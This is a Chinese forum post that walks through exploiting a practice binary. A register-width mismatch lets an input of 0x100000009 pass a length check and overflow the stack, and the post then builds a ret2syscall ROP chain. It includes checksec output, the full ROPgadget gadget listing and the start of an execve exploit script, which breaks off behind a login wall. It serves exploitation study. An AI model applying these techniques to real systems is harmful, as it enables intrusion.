12558网页游戏私服论坛

 找回密码
 立即注册
游戏开服表 申请开服
游戏名称 游戏描述 开服状态 游戏福利 运营商 游戏链接
攻城掠地-仿官 全新玩法,觉醒武将,觉醒技能 每周新区 经典复古版本,长久稳定 进入游戏
巅峰新版攻 攻城掠地公益服 攻城掠地SF 新兵种、新武将(兵种) 进入游戏
攻城掠地公 散人玩家的天堂 新开 进入游戏
改版攻城掠 上线即可国战PK 稳定新区 全新改版,功能强大 进入游戏
少年江山 高福利高爆率 刚开一秒 江湖水落潜蛟龙 进入游戏
太古封魔录 开服送10亿钻石 福利多多 不用充钱也可升级 进入游戏
神魔之道 签到送元宝 稳定开新区 送豪华签到奖励 进入游戏
神奇三国 统帅三军,招揽名将 免费玩新区 激情国战,征战四方 进入游戏
龙符 三日豪礼领到爽 天天开新区 助你征战无双 进入游戏
王者之师 免费领豪华奖励 免费玩新区 6元送6888元宝 进入游戏
查看: 149|回复: 0

由寄存器位数差异引发的漏洞利用

[复制链接]

63

主题

63

帖子

136

积分

实习版主

Rank: 7Rank: 7Rank: 7

积分
136
发表于 2020-7-7 20:12:20 | 显示全部楼层 |阅读模式
|63..32|31..16|15-8|7-0|               |AH.|AL.|               |AX.....|       |EAX............||RAX...................|以上是16,32,64位寄存器的大小。
安全检查

    Arch:     amd64-64-little    RELRO:    Partial RELRO    Stack:    No canary found    NX:       NX enabled    PIE:      No PIE (0x400000)IDA分析


可见有一处花指令,先nop掉看逻辑


要求输入小于等于10也就是0xA,否则程序退出。
查看汇编

可以发现
eax               0000 000arax     0000 0000 0000 000arax     0000 0001 0000 000a    构造成这样也可以通过cmp指令的隐含操作为 op1-op2判断是否等于0。因此可触发类似整数溢出的漏洞。
于是如果我们构造 0x1 0000 0009 - 0xa 就会将eax内容变为 0xffff ffff,从而在后面的read name可以读大量字节,造成栈溢出。
使用file命令查看发现程序为静态链接
ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=c69a6b123774b6c538eb99551edd57bc703c32f9, not stripped且程序内有syscall,因此直接使用ret2syscall进行ROP。
对于这道题来说,即可以手工构造给syscall传参,也可以使用 ROPgadget直接生成利用链
ROPgadget --binary intoverflow --ropchain直接生成如下
ROP chain generation===========================================================- Step 1 -- Write-what-where gadgets    [+] Gadget found: 0x47c601 mov qword ptr [rsi], rax ; ret    [+] Gadget found: 0x4017b7 pop rsi ; ret    [+] Gadget found: 0x480956 pop rax ; pop rdx ; pop rbx ; ret    [+] Gadget found: 0x42660f xor rax, rax ; ret- Step 2 -- Init syscall number gadgets    [+] Gadget found: 0x42660f xor rax, rax ; ret    [+] Gadget found: 0x46ea20 add rax, 1 ; ret    [+] Gadget found: 0x46ea21 add eax, 1 ; ret- Step 3 -- Init syscall arguments gadgets    [+] Gadget found: 0x401696 pop rdi ; ret    [+] Gadget found: 0x4017b7 pop rsi ; ret    [+] Gadget found: 0x442e46 pop rdx ; ret- Step 4 -- Syscall gadget    [+] Gadget found: 0x4003da syscall- Step 5 -- Build the ROP chain    #!/usr/bin/env python2    # execve generated by ROPgadget    from struct import pack    # Padding goes here    p = ''    p += pack('

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
楼主热帖
回复

使用道具 举报

*滑块验证:
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|12558网页游戏私服论坛 |网站地图

GMT+8, 2024-5-19 18:19 , Processed in 0.116211 second(s), 31 queries .

Powered by Discuz! X3.4

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表